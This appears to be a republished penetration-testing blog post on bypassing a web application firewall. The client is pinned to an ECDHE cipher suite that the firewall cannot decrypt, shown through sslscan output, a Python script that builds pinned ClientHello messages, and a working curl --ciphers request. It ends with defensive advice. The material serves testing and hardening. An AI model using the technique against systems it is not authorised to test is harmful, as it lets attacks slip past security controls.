

How to bypass the Web application firewall by abusing SSL and TLS

2025-01-27 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article describes how to bypass a web application firewall (WAF) by abusing SSL/TLS cipher-suite negotiation. The walkthrough is detailed, and interested readers may find it a useful reference.

Introduction

Over the past few years, web security has become one of the most important parts of the IT security field. The advantage of web applications is that developers can integrate a variety of key services in a short time, and maintenance is far easier than for traditional desktop applications. Alongside the design of new web standards, enterprises' security requirements for web applications are also changing. Below we introduce a technique for bypassing a web application firewall.

Background

Recently I tested a company's web application firewall. The infrastructure the company had deployed is as follows:

After gathering the information I needed, I set out to try several different bypass methods against the infrastructure. Besides the usual WAF testing techniques, I intended to use SSL cipher suites to bypass the WAF. When I first logged in to the WAF, the system displayed an "Unsupported SSL Ciphers" warning, which was very interesting. From the detailed product documentation I extracted every SSL cipher suite the device supports, but before getting started, here is a brief overview of how an SSL connection is established.

An SSL/TLS handshake consists of three main steps:

ClientHello/ServerHello stage

The handshake begins with a ClientHello message from the client, which carries everything the server needs to choose the session parameters: the highest protocol version the client supports, a random value, and the list of cipher suites the client is willing to use. After receiving it, the server answers with a ServerHello containing the information the client needs, including the protocol version and the single cipher suite the server has selected. The server can only select a suite that appeared in the client's list, which is the property the attack below relies on.

Certificate exchange

Once the hello exchange is complete, the server must authenticate itself to the client, so it sends its SSL certificate. The client verifies the certificate's authenticity, decides whether it can be trusted, and then continues the handshake.

Key exchange

The client and server then exchange the key material from which the session keys are derived, and only after that do they switch to encrypting and decrypting application data with those keys. What is exchanged depends on the negotiated cipher suite: with plain RSA key exchange the client encrypts a premaster secret to the public key in the server's certificate, so anyone holding the server's private key can recover the session keys; with ephemeral Diffie-Hellman suites (DHE/ECDHE) each side contributes a fresh share, and the session keys cannot be recovered from the server's private key alone.

Attack idea

My attack idea is as follows: if I initiate a connection to the target web server offering only a cipher suite that the WAF does not support, and the web server itself does support that suite, the WAF will not recognise my attack because it cannot see the plaintext of the request.

So, after going through the detailed technical documentation provided by the firewall vendor, I extracted all the supported SSL cipher suites, listed below.

SSLv3:
SSL_RSA_WITH_NULL_MD5
SSL_RSA_WITH_NULL_SHA
SSL_RSA_WITH_RC4_128_MD5
SSL_RSA_WITH_RC4_128_SHA
SSL_RSA_WITH_DES_CBC_SHA
SSL_RSA_WITH_3DES_EDE_CBC_SHA
SSL_RSA_EXPORT_WITH_RC4_40_MD5
SSL_RSA_EXPORT_WITH_DES40_CBC_SHA

TLS 1.0-1.2:
TLS_RSA_WITH_NULL_SHA256
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_EXPORT1024_WITH_RC4_56_MD5
TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_256_CBC_SHA256
TLS_RSA_WITH_RC4_128_MD5 = {0x00, 0x04}
TLS_RSA_WITH_RC4_128_SHA = {0x00, 0x05}
TLS_RSA_WITH_DES_CBC_SHA = {0x00, 0x09}

The next step is to identify the cipher suites the target web server supports. There are many ways to do this; I chose sslscan because it is easy to install and gives detailed output.

pwn@thinkpad:~$ sudo apt install sslscan
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  sslscan
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 26,7 kB of archives.
After this operation 81 kB of additional disk space will be used.
Get:1 http://al.archive.ubuntu.com/ubuntu bionic/universe amd64 sslscan amd64 1.11.5-rbsec-1.1 [26,7 kB]
Fetched 26,7 kB in 0s (73,8 kB/s)
Selecting previously unselected package sslscan.
(Reading database ... 177002 files and directories currently installed.)
Preparing to unpack .../sslscan_1.11.5-rbsec-1.1_amd64.deb ...
Unpacking sslscan (1.11.5-rbsec-1.1) ...
Processing triggers for man-db (2.8.3-2) ...
Setting up sslscan (1.11.5-rbsec-1.1) ...
pwn@thinkpad:~$ sslscan http://target/ | grep Accept

The command above enumerates every SSL/TLS version and cipher suite the target web server accepts. Comparing the sslscan results with the vendor's documentation, I found a cipher suite that the web application firewall does not support but the web server does:

Accepted TLSv1 256 bits ECDHE-RSA-AES256-SHA
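The comparison described above (sslscan's accepted suites against the vendor's documented list), together with the ClientHello/ServerHello negotiation it depends on, as an added example in Python that is not part of the original article. It assumes a WAF that reads the hello messages and can only follow a session negotiated with a suite it implements; the sslscan lines and the server's preference order are constructed sample data, the vendor list is abridged from the one quoted above, and the suite-id table is a subset of the IANA registry.

```python
"""Added example (not from the original article): model how the author's
cipher-suite comparison leads to a TLS session the WAF cannot inspect.

Assumptions not stated on the page: the WAF reads the ClientHello/ServerHello
and can only follow sessions negotiated with a suite it implements; the
sslscan lines and the server preference order are constructed sample data;
the vendor list is abridged from the one quoted in the article."""
import struct

# Subset of the IANA cipher-suite registry: IANA name -> (suite id, OpenSSL name).
# sslscan and curl use the OpenSSL names; vendor documentation uses IANA names.
SUITES = {
    "TLS_RSA_WITH_RC4_128_MD5":              (0x0004, "RC4-MD5"),
    "TLS_RSA_WITH_RC4_128_SHA":              (0x0005, "RC4-SHA"),
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA":         (0x000A, "DES-CBC3-SHA"),
    "TLS_RSA_WITH_AES_128_CBC_SHA":          (0x002F, "AES128-SHA"),
    "TLS_RSA_WITH_AES_256_CBC_SHA":          (0x0035, "AES256-SHA"),
    "TLS_RSA_WITH_AES_128_CBC_SHA256":       (0x003C, "AES128-SHA256"),
    "TLS_RSA_WITH_AES_256_CBC_SHA256":       (0x003D, "AES256-SHA256"),
    "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA":    (0xC013, "ECDHE-RSA-AES128-SHA"),
    "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA":    (0xC014, "ECDHE-RSA-AES256-SHA"),
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256": (0xC02F, "ECDHE-RSA-AES128-GCM-SHA256"),
}
OPENSSL_TO_IANA = {o: n for n, (_, o) in SUITES.items()}

# Abridged from the vendor list in the article: every entry uses RSA key exchange.
WAF_DOCUMENTED = [
    "TLS_RSA_WITH_RC4_128_MD5", "TLS_RSA_WITH_RC4_128_SHA",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA", "TLS_RSA_WITH_AES_128_CBC_SHA",
    "TLS_RSA_WITH_AES_128_CBC_SHA256", "TLS_RSA_WITH_AES_256_CBC_SHA256",
]

# Constructed sslscan output for a server that also offers an ECDHE suite.
SAMPLE_SSLSCAN = """\
Testing SSL server target on port 443
  Supported Server Cipher(s):
Accepted  TLSv1.2  128 bits  AES128-SHA
Accepted  TLSv1.2  256 bits  AES256-SHA256
Accepted  TLSv1    256 bits  ECDHE-RSA-AES256-SHA
Rejected  TLSv1    128 bits  RC4-SHA
"""


def parse_sslscan(output):
    """OpenSSL names of the suites sslscan reports as Accepted (5th column)."""
    return [line.split()[4] for line in output.splitlines()
            if line.startswith("Accepted") and len(line.split()) >= 5]


def bypass_candidates(server_openssl_names, waf_iana_names):
    """Suites the server accepts that the WAF's documentation does not list."""
    waf = set(waf_iana_names)
    return [n for n in server_openssl_names
            if n in OPENSSL_TO_IANA and OPENSSL_TO_IANA[n] not in waf]


def build_client_hello(suite_ids):
    """Minimal TLS 1.2 ClientHello record offering exactly `suite_ids`
    (no extensions; an all-zero client random is fine for a parser demo)."""
    body = b"\x03\x03" + bytes(32) + b"\x00"      # version, random, empty session id
    suites = b"".join(struct.pack("!H", s) for s in suite_ids)
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"                             # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # type 1 = ClientHello
    return b"\x16\x03\x03" + struct.pack("!H", len(handshake)) + handshake


def parse_client_hello(record):
    """Suite ids offered in a ClientHello record, the way an inspecting WAF reads them."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a ClientHello record")
    pos = 5 + 4 + 2 + 32            # record header, handshake header, version, random
    pos += 1 + record[pos]          # session id length byte + session id
    n = struct.unpack("!H", record[pos:pos + 2])[0]
    pos += 2
    return [struct.unpack("!H", record[pos + i:pos + i + 2])[0] for i in range(0, n, 2)]


def negotiate(offered_ids, server_preference_ids):
    """Suite a server with its own preference order picks from the client's offer."""
    for s in server_preference_ids:
        if s in offered_ids:
            return s
    return None


def waf_can_inspect(client_hello, server_preference_ids, waf_iana_names):
    """True if the session will be negotiated with a suite the WAF implements."""
    waf_ids = {SUITES[n][0] for n in waf_iana_names if n in SUITES}
    return negotiate(parse_client_hello(client_hello), server_preference_ids) in waf_ids


if __name__ == "__main__":
    server_prefs = [0x002F, 0x003D, 0xC014]        # constructed: RSA suites preferred
    cands = bypass_candidates(parse_sslscan(SAMPLE_SSLSCAN), WAF_DOCUMENTED)
    full_offer = build_client_hello([0xC014, 0x002F, 0x003D])     # a normal client
    pinned = build_client_hello([SUITES[OPENSSL_TO_IANA[cands[0]]][0]])  # curl --ciphers
    print("candidates:", cands)
    print("normal offer inspectable:", waf_can_inspect(full_offer, server_prefs, WAF_DOCUMENTED))
    print("pinned offer inspectable:", waf_can_inspect(pinned, server_prefs, WAF_DOCUMENTED))
    print("curl --ciphers %s https://target/ssl-cipher-test" % cands[0])
```

With a normal client offer the server, preferring its RSA suites, picks one the WAF can decrypt; pinning the offer to the single candidate forces the ECDHE suite and the WAF's view of the session ends at the handshake.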

To confirm the idea, I created a WAF rule that blocks requests whose path is /ssl-cipher-test.

Requesting that path over a normal connection is blocked, as expected:

The quickest way to exploit this is to restrict the client to a single cipher suite, so that the server has nothing else to choose from. curl's "--ciphers" option sets the suites the client offers; here I pin it to ECDHE-RSA-AES256-SHA:

pwn@thinkpad:~$ curl --ciphers ECDHE-RSA-AES256-SHA https://waf-test.lab.local/ssl-cipher-test
HELLO

Bypass worked

pwn@thinkpad:~$

As the response body shows, the request reached the web server and the web application firewall was bypassed. The reason is visible in the vendor's list: every suite the device supports uses plain RSA key exchange, which a device holding the server's private key can decrypt, whereas ECDHE-RSA-AES256-SHA uses an ephemeral Diffie-Hellman exchange whose session keys cannot be recovered from that key; and rather than dropping a session it could not decrypt, the device evidently passed it through. On the defensive side, the checks that follow from this are to have the WAF terminate TLS itself (or at least fail closed on suites it cannot decrypt) and to keep the origin server's cipher list aligned with what the inspection device actually supports; on the testing side, comparing sslscan's accepted suites against the vendor's list is a cheap first step before any other WAF evasion.

